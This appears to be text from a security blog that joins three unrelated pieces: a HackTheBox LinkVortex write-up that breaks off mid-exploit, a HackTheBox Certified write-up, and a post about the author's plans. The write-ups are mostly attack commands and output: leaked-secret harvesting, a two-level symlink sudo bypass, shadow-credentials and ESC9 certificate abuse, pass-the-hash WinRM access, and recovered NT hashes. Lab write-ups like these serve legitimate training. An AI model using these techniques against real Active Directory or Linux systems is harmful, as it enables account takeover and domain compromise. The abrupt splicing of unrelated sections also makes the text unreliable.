nmap finds two open TCP ports, SSH (22) and HTTP (80):
croc@hacker$rustscan-a10.10.11.47--ulimit5000---A-T5-oAInitial[~] Automatically increasing ulimit value to 5000.Open10.10.11.47:22Open10.10.11.47:80[~] Starting Nmap[>] The Nmap command to be run is nmap -A -T5 -oA Initial -vvv -p 22,80 10.10.11.47Nmapscanreportforlinkvortex.htb (10.10.11.47) Hostisup,receivedsyn-ack (0.25s latency).Scannedat2025-01-0508:59:07ESTfor25sPORTSTATESERVICEREASONVERSION22/tcpopensshsyn-ackOpenSSH8.9p1Ubuntu3ubuntu0.10 (Ubuntu Linux;protocol2.0)|ssh-hostkey:|2563e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)|ecdsa-sha2-nistp256AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMHm4UQPajtDjitK8Adg02NRYua67JghmS5m3E+yMq2gwZZJQ/3sIDezw2DVl9trh0gUedrzkqAAG1IMi17G/HA=|256a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)|_ssh-ed25519AAAAC3NzaC1lZDI1NTE5AAAAIKKLjX3ghPjmmBL2iV1RCQV9QELEU+NF06nbXTqqj4dz80/tcpopenhttpsyn-ackApachehttpd|_http-server-header:Apache|_http-generator:Ghost5.58|_http-title:BitByBitHardware|http-methods:|_SupportedMethods:POSTGETHEADOPTIONS|http-robots.txt:4disallowedentries|_/ghost//p//email//r/|_http-favicon:UnknownfaviconMD5:A9C6DBDCDC3AE568F4E0DAD92149A0E3ServiceInfo:OS:Linux;CPE:cpe:/o:linux:linux_kernel
We will be using git-dumper tool inside of a Python Virtual Environment to dump this .git directory. We’re using a Virtual Environment as they’re externally managed by apt inside of Kali Linux leaving the default environment untouched. Use the following commands to set it up:
In order to dump secrets like passwords, api keys, etc. out of this loot directory, we’ll be using another tool called gitleaks. You need to have two things to get going:
I have saved both of these into my /opt/gitleaks folder and will be using it from there while pointing to the loot directory.
croc@hacker:/opt/gitleaks$sudo./gitleaks-cgitleaks.toml-rfindings.jsondir/home/croc/HTB/linkvortex/git/my_git/loot○│╲│○○░░gitleaks10:20AMINFscanned~31628339bytes (31.63 MB) in 9.59s10:20AMWRNleaksfound:67
This password was found inside the /ghost/core/test/regression/api/admin/authentication.test.js file & is most likely the password for the admin account.
Logging into Ghost Admin Dashboard
Let’s try to log in into the Ghost Admin Dashboard with the password found:
And, I got in!! Hohooo!!
Shell as Bob
Recall the exploit we found at the very start that required a pair of credential to work. Now, as we have a pair of valid credentials, let’s test that out!
Researching about Ghost on Google & AI, I found /var/www/ghost/config.production.json file to be a sensitive configuration file but, unfortunately this file doesn’t exist here.
Upon further searching, I found out that sometimes when Ghost might be installed via Docker, paths may differ based on the container configuration. In such cases, configuration files are often mounted in /var/lib/ghost/ or similar directories. So, I tried that out and guess what, this file exists and revealed the password for bob@linkvortex.htb.
I gained initial shell access with the above set of credential via ssh:
croc@hacker$sshbob@10.10.11.47Theauthenticityofhost'10.10.11.47 (10.10.11.47)'can't be established.ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.11.47' (ED25519) to the list of known hosts.bob@10.10.11.47'spassword:WelcometoUbuntu22.04.5LTS (GNU/Linux 6.5.0-27-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/proThissystemhasbeenminimizedbyremovingpackagesandcontentthatarenotrequiredonasystemthatusersdonotloginto.Torestorethiscontent,youcanrunthe'unminimize'command.Lastlogin:TueDec311:41:502024from10.10.14.62bob@linkvortex:~$
Bob can execute clean_symlink.sh as sudo without a password. The *.png is a shell glob pattern that allows Bob to run the script on any .png file. Additionally, the CHECK_CONTENT environment variable is preserved, meaning its value remains available inside the script even when executed with sudo.
Let’s see what that bash file is doing.
clean_symlink.sh
Note that we do not have write permissions to the file:
bob@linkvortex:~$cat/opt/ghost/clean_symlink.sh#!/bin/bashQUAR_DIR="/var/quarantined"if[-z $CHECK_CONTENT ];then CHECK_CONTENT=falsefiLINK=$1if![["$LINK"=~ \.png$ ]];then/usr/bin/echo"! First argument must be a png file !"exit2fiif/usr/bin/sudo/usr/bin/test-L $LINK;then LINK_NAME=$(/usr/bin/basename$LINK) LINK_TARGET=$(/usr/bin/readlink$LINK)if/usr/bin/echo"$LINK_TARGET"|/usr/bin/grep-Eq'(etc|root)';then/usr/bin/echo"! Trying to read critical files, removing link [ $LINK ] !"/usr/bin/unlink $LINKelse/usr/bin/echo"Link found [ $LINK ] , moving it to quarantine"/usr/bin/mv $LINK $QUAR_DIR/if $CHECK_CONTENT;then/usr/bin/echo"Content:"/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/nullfififi
In a nutshell, the script detects symbolic links in .png files. If the link points to a sensitive location (/etc or /root), it gets removed. Otherwise, the .png file is moved to a quarantine folder at /var/quarantined, and its content may be displayed if CHECK_CONTENT=true.
Let me give you a practical demonstration of how this is working.
Testing the Functionality
I created a file intro.txt where I put my introduction in German(Just for fun). Then, I created a symbolic link named test.png pointing to intro.txt.
bob@linkvortex:~$echo"Hallo! Ich bin Haseeb und ich komme aus Pakistan. Ich bin student im universitat">intro.txtbob@linkvortex:~$ln-s/home/bob/intro.txttest.pngbob@linkvortex:~$ls-latotal40drwxr-x---5bobbob4096Feb2319:26.drwxr-xr-x3rootroot4096Nov3010:07..lrwxrwxrwx1rootroot9Apr12024.bash_history ->/dev/null-rw-r--r--1bobbob220Jan62022.bash_logout-rw-r--r--1bobbob3771Jan62022.bashrcdrwx------2bobbob4096Nov108:40.cachedrwx------3bobbob4096Feb2222:39.gnupgdrwxrwxr-x3bobbob4096Feb2222:48.local-rw-r--r--1bobbob807Jan62022.profile-rw-rw-r--1bobbob81Feb2319:25intro.txtlrwxrwxrwx1bobbob19Feb2319:26test.png ->/home/bob/intro.txt-rw-r-----1rootbob33Feb2221:58user.txt
After that, I fed the test.png file into the clean_symlink.sh script with CHECK_CONTENT=true. This gave the content of intro.txt file as output:
This printed out the contents of intro.txt file we created above.
💡 Think Box
Now, how can we utilize that to get the root flag?
Our target is /root/root.txt but we can’t directly create a symbolic link to that because the clean_symlink.sh script removes direct symbolic links pointing to sensitive locations (e.g., /root/ or /etc). However, there is a workaround for this.
Workaround
The above script only checks for the first level of the symlink. Instead of directly creating a symlink to /root/root.txt, we can try doing it in two steps.
First, I created a symlink named supportmeonpatreon.txt pointing to /root/root.txt & then I created another symlink named exploit.png pointing to /home/bob/supportmeonpatreon.txt.
I started by looking at our environment and evaluating the attack surface:
croc@hacker$sudo/usr/bin/ldapdomaindumpldap://10.10.11.41-u'CERTIFIED\judith.mader'-p'judith09'[*] Connecting to host...[*] Binding to host[+] Bind OK[*] Starting domain dump[+] Domain dump finishedcroc@hacker$lsdomain_computers_by_os.htmldomain_groups.grepdomain_policy.htmldomain_trusts.jsondomain_users.jsondomain_computers.grepdomain_groups.htmldomain_policy.jsondomain_users_by_group.htmldomain_computers.htmldomain_groups.jsondomain_trusts.grepdomain_users.grepdomain_computers.jsondomain_policy.grepdomain_trusts.htmldomain_users.htmlcroc@hacker$firefoxdomain_users_by_group.html
This gave me a clear understanding of all the users and groups on the target. I have the habit of creating a users.txt file that comes very handy afterwards when password spraying.
The ca_operator account presents some possibility of AD CS exploitation due to a clue in its name. Furthermore, I see the management_svc account to have WinRM access.
SMB – 139/445
I enumerated the available shares but none of them looked interesting to me. So, this is not the way to go for sure!
I dumped the .json configuration files using Python BloodHound Ingestor & uploaded the data in bloodhound.
croc@hacker$python3-mbloodhound-dcertified.htb-u'judith.mader'-p'judith09'-ns10.10.11.41-callINFO:FoundADdomain:certified.htbINFO:GettingTGTforuserWARNING:FailedtogetKerberosTGT.FallingbacktoNTLMauthentication.Error: [Errno Connectionerror (dc01.certified.htb:88)] [Errno -2] Name or service not knownINFO:ConnectingtoLDAPserver:dc01.certified.htbINFO:Found1domainsINFO:Found1domainsintheforestINFO:Found1computersINFO:ConnectingtoLDAPserver:dc01.certified.htbINFO:Found10usersINFO:Found53groupsINFO:Found2gposINFO:Found1ousINFO:Found19containersINFO:Found0trustsINFO:Startingcomputerenumerationwith10workersINFO:Queryingcomputer:DC01.certified.htbINFO:Donein00M47Scroc@hacker$ls20250122051720_computers.json20250122051720_groups.json20250122051720_containers.json20250122051720_ous.json20250122051720_domains.json20250122051720_users.json20250122051720_gpos.json
Under first degree object control, I found that judith.mader has WriteOwner permissions over the management@certified.htb group. This means that we can make ourselves the owner of this group & move forward from there.
Shell as Management_svc
Take Ownership
I made judith.mader the owner of the management@certified.htb group. Furthermore, I also gave judith.mader full control over the group.
croc@hacker$sudoimpacket-owneredit-actionwrite-new-owner'judith.mader'-target'management'-dc-ip10.10.11.41'certified.htb/judith.mader:judith09'2>/dev/nullImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Current owner information below[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512[*] - sAMAccountName: Domain Admins[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb[*] OwnerSid modified successfully!croc@hacker$impacket-dacledit-actionwrite-rights'FullControl'-principal'judith.mader'-target'management'-dc-ip10.10.11.41'certified.htb/judith.mader:judith09'2>/dev/nullImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] DACL backed up to dacledit-20250122-084900.bak[*] DACL modified successfully!
BloodHound
As we have full control over the management@certified.htb group, it’s worth checking what potential pathways do we have in bloodhound. I found out that members of this group have GenericWrite privileges over the user account of management_svc.
💡 Think Box
This allows us to perform a Shadow Credentials Attack if we’re a member of the management@certified.htb group.
Adding ourselves to the Management Group
I used bloodyAD to add judith.mader into the management group:
croc@hacker$bloodyAD-u'judith.mader'-p'judith09'-d'certified.htb'--host10.10.11.41addgroupMember'Management''judith.mader'[+] judith.mader added to Management
Now, we can perform the shadow credentials attack as we have write privileges over management_svc which is a remote management user as well.
Shadow Credentials Attack
In summary, if a user has GenericWrite over another user object, it can modify the msDS-KeyCredentialLink attribute of that user to add their own public key. This allows us to perform a Shadow Credentials attack.
Now, as soon as we authenticate using the corresponding private key and certificate via PKINIT, we obtain a TGT as the target user.
After that, we can extract the NT hash using the TGT. Let’s put it all into action!
We will be using pywhisker for creating the shadow credentials along with PKINITtools in order to request the TGT and get the NT hash.
Step #01: Virtual Environment
It’s better to work in a virtual environment so that our main system remains unaffected:
Using pywhisker, I modified the msDS-KeyCredentialLink attribute of management_svc while authenticating as judith.mader:
(shadow)croc@hacker$ python3 pywhisker/pywhisker/pywhisker.py -d 'certified.htb' -u 'judith.mader' -p 'judith09' --target 'management_svc' --action add[*] Searching for the target account[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb[*] Generating certificate[*] Certificate generated[*] Generating KeyCredential[*] KeyCredential generated with DeviceID: 38127bd6-4f2a-d064-e4e3-e6e4e5b539c9[*] Updating the msDS-KeyCredentialLink attribute of management_svc[+] Updated the msDS-KeyCredentialLink attribute of the target object[+] Saved PFX (#PKCS12) certificate & key at path: WldHpeku.pfx[*]Mustbeusedwithpassword:dPy8eLovBBsTA4ucFZFI[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Note that the associated private key and certificate are stored in the WldHpeku.pfx file using which we will request a TGT.
Step #03: Request a TGT
Using WldHpeku.pfx file generated above along with its password, I requested a TGT which is saved into the management_svc.ccache file.
I learned to use faketime alongside ntpdate to mitigate the KRB_AP_ERR_SKEW error from 0xCOFFEE. Additionally, it’s important to note the AS-REP encryption key value, as it will be required in the next step.
Step #04: NT Hash
Further, I used getnthash.py against the management_svc.ccache file(TGT) to request a service ticket for the current user using U2U. The KDC responded with the service ticket that contain the PAC, encrypted with the session key.
As the TGT used to request the service ticket was obtained via PKINIT, the PAC contains the NT hash of the authenticated user. Our goal is to extract that NT Hash!
(shadow)croc@hacker$ export KRB5CCNAME=management_svc.ccache (shadow)croc@hacker$ faketime "$(ntpdate -q 10.10.11.41 |cut -d '' -f 1,2)" python3 PKINITtools/getnthash.py -key a53dfd2e95fa729f54179127e81c09b0c646daf2accde582684e49c8d362b92c certified.htb/management_svcImpacketv0.12.0-CopyrightFortra,LLCanditsaffiliatedcompanies[*] Using TGT from cache[*] Requesting ticket to self with PACRecoveredNTHasha091c1832bcdd4677c28b5a6a1295584
We have successfully retrieved the NT hash of management_svc account. Have some dance lol!!!
Alternative – certipy-ad
An alternative way to perform the shadow credentials attack which is much more convenient is by using certipy-ad:
croc@hacker:~$faketime"$(ntpdate -q 10.10.11.41 |cut -d '' -f 1,2)"certipy-adshadowauto-username'judith.mader@certified.htb'-p'judith09'-account'management_svc'Certipyv4.8.2-byOliverLyak (ly4k)[*] Targeting user 'management_svc'[*] Generating certificate[*] Certificate generated[*] Generating Key Credential[*] Key Credential generated with DeviceID '9588457c-3627-8282-5932-ded69c8d8065'[*] Adding Key Credential with device ID '9588457c-3627-8282-5932-ded69c8d8065' to the Key Credentials for'management_svc'[*] Successfully added Key Credential with device ID '9588457c-3627-8282-5932-ded69c8d8065' to the Key Credentials for'management_svc'[*] Authenticating as 'management_svc' with the certificate[*] Using principal: management_svc@certified.htb[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'management_svc.ccache'[*] Trying to retrieve NT hash for'management_svc'[*] Restoring the old Key Credentials for'management_svc'[*] Successfully restored the old Key Credentials for'management_svc'[*] NT hash for'management_svc': a091c1832bcdd4677c28b5a6a1295584
WinRM as management_svc
As management_svc is a remote management user, we can gain evil-winrm shell access:
croc@hacker:~$sudoevil-winrm-i10.10.11.41-umanagement_svc-Ha091c1832bcdd4677c28b5a6a1295584[sudo] password for croc: Evil-WinRMshellv3.7Warning:Remotepathcompletionsisdisabledduetorubylimitation:quoting_detection_proc()functionisunimplementedonthismachineData:Formoreinformation,checkEvil-WinRMGitHub:https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo:Establishingconnectiontoremoteendpoint*Evil-WinRM* PS C:\Users\management_svc\Documents>
The user management_svc has GenericAll privileges over the user ca_operator.
This is also known as full control. This privilege allows the trustee to manipulate the target object however they wish.
💡 Think Box
We have multiple attack options here. The most straightforward approach is a password reset, but we can also consider targeted Kerberoasting or leveraging shadow credentials. Learn more about the potential attack paths with GenericAll here.
Since we’ve already explored the shadow credentials attack, I attempted targeted Kerberoasting. However, the extracted hash didn’t crack, so this approach wasn’t successful. Given this, resetting the password remains the most viable option.
Force Password Change
I used bloodyAD to change the password for ca_operator account to supportmeonPatreon while authenticating as management_svc:
You can also do that from the WinRM session we already have:
*Evil-WinRM* PS C:\Users\management_svc\Documents> net user 'ca_operator''supportmeonPatreon' /domainThecommandcompletedsuccessfully.
💡 Think Box
If I had to guess, the user account ca_operator might lead us with some AD CS exploitation. Let’s enumerate on that!
AD CS Enumeration
Identify AD CS
I used nxc with the adcs module and guess what, we actually have a AD CS in place.
croc@hacker:$nxcldap10.10.11.41-u'ca_operator'-p'supportmeonPatreon'-MadcsLDAP10.10.11.41389DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01)(domain:certified.htb)LDAP10.10.11.41389DC01 [+] certified.htb\ca_operator:supportmeonPatreon ADCS10.10.11.41389DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'ADCS10.10.11.41389DC01FoundPKIEnrollmentServer:DC01.certified.htbADCS10.10.11.41389DC01FoundCN:certified-DC01-CA
Misconfigured Certificate Templates
I used certipy-ad to find enabled and vulnerable certificate templates:
croc@hacker:$certipy-adfind-u'ca_operator'-p'supportmeonPatreon'-dc-ip10.10.11.41-enabled-vulnerableCertipyv4.8.2-byOliverLyak (ly4k)[*] Finding certificate templates[*] Found 34 certificate templates[*] Finding certificate authorities[*] Found 1 certificate authority[*] Found 12 enabled certificate templates[*] Trying to get CA configuration for'certified-DC01-CA' via CSRA[!] Got error whiletryingtogetCAconfigurationfor'certified-DC01-CA'viaCSRA:CASessionError:code:0x80070005-E_ACCESSDENIED-Generalaccessdeniederror.[*] Trying to get CA configuration for'certified-DC01-CA' via RRP[!] Failed to connect to remote registry. Service should be starting now. Trying again...[*] Got CA configuration for'certified-DC01-CA'[*] Saved BloodHound data to '20250122183515_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k[*] Saved text output to '20250122183515_Certipy.txt'[*] Saved JSON output to '20250122183515_Certipy.json'
A template named CertifiedAuthentication was found of being vulnerable to ESC9:
To understand ESC9, you need to understand certificate mapping. Note that this is gonna be just a high-level overview of what’s happening under the hood. For detailed understanding, refer to the resources at the end of this post.
Certificate Mapping
Normally, you use a username and a password to authenticate in Active Directory(AD). The DC will look up the AD account with a matching username and verify that the password you provided is correct for this account.
However, when you use a certificate instead of a password for authentication purposes, the DC will perform “Certificate Mapping” to verify that the certificate “maps” to the AD account you specified.
There are two types of certificate mapping: implicit and explicit. We’re only concerned with implicit certificate mapping in this case.
Implicit Certificate Mapping
Assume that a user bob enrolls a certificate from AD CS, the certificate authority(CA) includes his userPrincipalName or UPN in the othername field of the issued certificate. The othername field is an extension of SAN.
Now, when bob tries to authenticate with his username and the certificate, the DC checks if the certificate maps to Bob’s account by comparing the UPN in the othername field of the certificate with the UPN attribute stored in Bob’s AD account. This particular concept is called UPN Mapping.
Also note that computer accounts do not have a UPN, so in that case we use DNS Mapping, where the dnsHostName (DNS) attribute is used instead. This whole process is called Implicit Certificate Mapping.
The Attack
The following is the flow of the attack against weak implicit certificate mapping:
1. Modify the victim’s UPN/DNS attribute to match the target’s UPN/DNS or sAMAccountName.
2. Enroll a certificate as victim. This will cause the UPN/DNS of target be injected on the certificate. Revert the UPN value of victim account after enrolling the certificate.
3. Use the certificate to authenticate as target account.
Here’s an animation from Jonas Bülow Knudsen to illustrate that:
The Patch
Microsoft introduced the concept of “strong mapping” in order to address this issue. They made the Enterprise CAs add a new certificate extension (i.e., szOID_NTDS_CA_SECURITY_EXT) to new certificates containing the enrollee’s SID. This extension is commonly called SID or security extension. This extension enables the DC to verify that the account that enrolled the certificate is also the account the certificate maps to or otherwise disallow the authentication attempt.
Microsoft also introduced a new certificate template flag called NO_SECURITY_EXTENSION for the msPKI-Enrollment-Flag attribute of certificate templates.. If enabled, the enterprise CA avoids adding the SID extension to certificates of the given template.
In addition to that, for the purpose of enforcement of strong mapping, Microsoft released two new registry key values, StrongCertificateBindingEnforcement for Kerberos Authentication and CertificateMappingMethods for Schannel Authentication.
Abusing ESC9
Oliver Lyak discovered that the patch didn’t prevent his implicit certificate mapping exploit in its entirety. It was still possible under certain circumstances which he called ESC9 and ESC10.(We’ll only discuss ESC9)
Following are the requirements of ESC9:
Account A has GenericWrite over Account B
Certificate template has the NO_SECURITY_EXTENSION flag enabled
StrongCertificateBindingEnforcement set to 0/1 (Disabled/Compatibility) OR CertificateMappingMethods contains UPN flag
Privilege Escalation Chain
The privilege escalation chain in this case looks like this:
1. The user management_svc has GenericAll over ca_operator so change the UPN of ca_operator to administrator.
2. Request the certificate as ca_operator using the vulnerable template. This will cause the UPN of administrator be injected on the issued certificate.
3. Revert the UPN of ca_operator back to its original form so that the certificate doesn’t maps to this account when authenticating.
4. Authenticate as the Domain Administrator.
Step #01: Change the UPN
I changed the UPN of ca_operator to administrator. It couldn’t be administrator@certified.htb because that would conflict with the legitimate account, as UPNs must be unique to single accounts.
croc@hacker$certipy-adaccountupdate-username'management_svc@certified.htb'-hashes'a091c1832bcdd4677c28b5a6a1295584'-user'ca_operator'-upn'Administrator'Certipyv4.8.2-byOliverLyak (ly4k)[*] Updating user 'ca_operator':userPrincipalName:Administrator[*] Successfully updated 'ca_operator'
Step#02: Request a Certificate using the Vulnerable Template
I requested a certificate using the above found vulnerable template as ca_operator. This will cause the UPN of administrator to be injected on to the certificate in the othername field.
croc@hacker$certipy-adreq-u'ca_operator@certified.htb'-p'supportmeonPatreon'-ca'certified-DC01-CA'-template'CertifiedAuthentication'Certipyv4.8.2-byOliverLyak (ly4k)[*] Requesting certificate via RPC[*] Successfully requested certificate[*] Request ID is 23[*] Got certificate with UPN 'Administrator'[*] Certificate has no object SID[*] Saved certificate and private key to 'administrator.pfx'
Step #03: Restore the Changes
I reverted the UPN of ca_operator back to its original form so that when we authenticate using the administrator.pfx certificate, it doesn’t maps to this account.
croc@hacker$certipy-adaccountupdate-username'management_svc@certified.htb'-hashes'a091c1832bcdd4677c28b5a6a1295584'-user'ca_operator'-upn'ca_operator@certified.htb'Certipyv4.8.2-byOliverLyak (ly4k)[*] Updating user 'ca_operator':userPrincipalName:ca_operator@certified.htb[*] Successfully updated 'ca_operator'
Step #04: Authenticate as Domain Administrator
Next, I used the certificate to authenticate as domain admin giving out the administrator’s NTLM hash:
croc@hacker$certipy-adauth-pfxadministrator.pfx-domain'certified.htb'-dc-ip10.10.11.41Certipyv4.8.2-byOliverLyak (ly4k)[*] Using principal: administrator@certified.htb[*] Trying to get TGT...[*] Got TGT[*] Saved credential cache to 'administrator.ccache'[*] Trying to retrieve NT hash for'administrator'[*] Got hash for'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34
As we dive into 2025, I’m thrilled to introduce you to the Upcoming Blog Series here at CrocHub. This marks the first “Chronicles” post rather than a technical one, and I’m keeping it casual to give you a sneak peek of what’s in store. My goal? To help you decide if the content I’m planning is worth your time (spoiler: it is 😁).
I’m dedicated to sharing valuable content with a writing style that’s so engaging and relatable that you’ll keep coming back for more. I want to create something you genuinely look forward to reading, and I promise you that it’s mostly going to be really practical hands-on stuff, along with the thought process behind every step, and some bad jokes (you’ve been warned lol).
Without further ado, let’s dive into what’s coming your way!
CrocHub – What to Expect?
Following are the topics on which I will be starting a blog series:
1) Active Directory Hacking
Active Directory (AD) is a hacker’s playground—and for good reason.
Over 90% of the Fortune 1000 companies use AD in their IT infrastructure. That statistic alone highlights it’s importance when we talk about exploiting and assessing the security posture of an organization.
In this blog series, I will walk you through each and every attack possible in the GOAD(Game of Active Directory) lab. From the lab setup to exploitation and mitigations, I am here at your service!
This series will serve as a cornerstone for this blog & your ultimate war manual for AD battlefield. So, gear up and be excited!
2) Wifi Hacking
Wi-Fi networks are everywhere—and so are their vulnerabilities. From Coffee shops to enterprise setups, poorly configured wireless networks can be a hacker’s goldmine and a nightmare for the sysadmin.
As part of this series, we’ll set up a home wifi hacking lab and perform all the common wifi-related attacks while also learning the steps to secure and mitigate these vulnerabilities.
3) HTB/THM Writeups
Occasionally, I do plan on doing some detailed writeups of HackTheBox & TryHackme challenges. These will include all the necessary steps from boot to root while my key focus is going to be on the thought process behind every step. I’ll try to add as much context and details as possible which will help you learn how to think like a hacker.(Tho I am also still learning that😉)
I’ll be doing more of AD or Windows based boxes because that’s my strongest side.
4) Cheat Sheets
Cheat sheets are lifesavers, whether you’re on a real-life engagement or tackling a live exam. These can help you stay organized, streamline your workflow and avoid overlooking critical steps. I do plan on creating extensive cheat sheets on stuff like enumeration, privilege escalation, or what I feel like is beneficial.
Before ending up, I would like to share about my journey and my upcoming goals briefly.
From /dev/null to here
Backstory
My journey in cybersecurity began in the most unexpected way—after watching a Bollywood movie. The film tho was based on unrealistic simulations, it ignited a spark in me! It outlined the bad impact those malicious guys can have in our society, and more importantly, it fueled a deep curiosity to learn more about hacking so that I can contribute to make the online world a better place. As a result, I dived right in!
First Steps
It was the start of 2023; I started tinkering around & watching different videos on YouTube about the career pathway and all that kinda stuff. I learned that Linux is essential for an ethical hacker, and this was the first time I was introduced to the term “virtualization“. I installed Kali Linux in a VM(Virtual Machine) and started watching tutorials on how to use it.
To strengthen my foundation, I enrolled in courses for Python and Bash scripting. While I managed to complete them, I realized that a lack of consistent practice caused much of the knowledge to fade over time. Recognizing this gap, I plan to revisit and redo these courses to ensure a deeper and more lasting understanding.
Starting from there, one day I came across the 2023 roadmap for an ethical hacker by The Cyber Mentor@TCM Security, which gave me a clear pathway of where to go. However, it has an updated version for 2025 published recently which you can see below:
PNPT
As I got to TCM Security, I heard about their most famous cert, the PNPT(Practical Network Penetration Tester). I started preparing for it at the start of 2024. The first course I started doing was the PEH(Practical Ethical Hacking) course. But I realized that my networking skills weren’t up to the mark so I left that over there and went to do a networking course from YouTube. I did the CCNA course from networkchuck though there are a hell lot of other options available as well.
With my networking skills improved, I went back to working on my goal of getting the PNPT certification. After months of hard work and focus, I was able to achieve it in November 2024—something I couldn’t have done without the help and blessings of ALLAH.
I’ll be sharing a detailed review of the exam, packed with tips and resources to help you pass on your first attempt. Stay tuned!
Feel free to explore the About page to learn more about me!
croc, What’s next?
I have set several goals for 2025, and inshALLAH, I am determined to achieve them:
G1: Projects
I plan to work on some projects that solve real world pentesting challenges and streamline the pentester’s workflow.
G2: Being a Cyber Mentor
Knowledge shared is knowledge multiplied. Hence, I aim to become a cyber mentor and give back to the community. Feel free to DM me on Discord if you need help with anything. My username is, you all know, @croclius.
G3: Repeat, Repeat & Repeat
Repetition is the foundation of mastery in cybersecurity. I plan on revisiting my notes and practicing stuff back and forth until it becomes second nature.
Final Thoughts
I am determined to provide you with as much value as possible and look forward to your strong support on this journey. Thanks for checking out my blog!
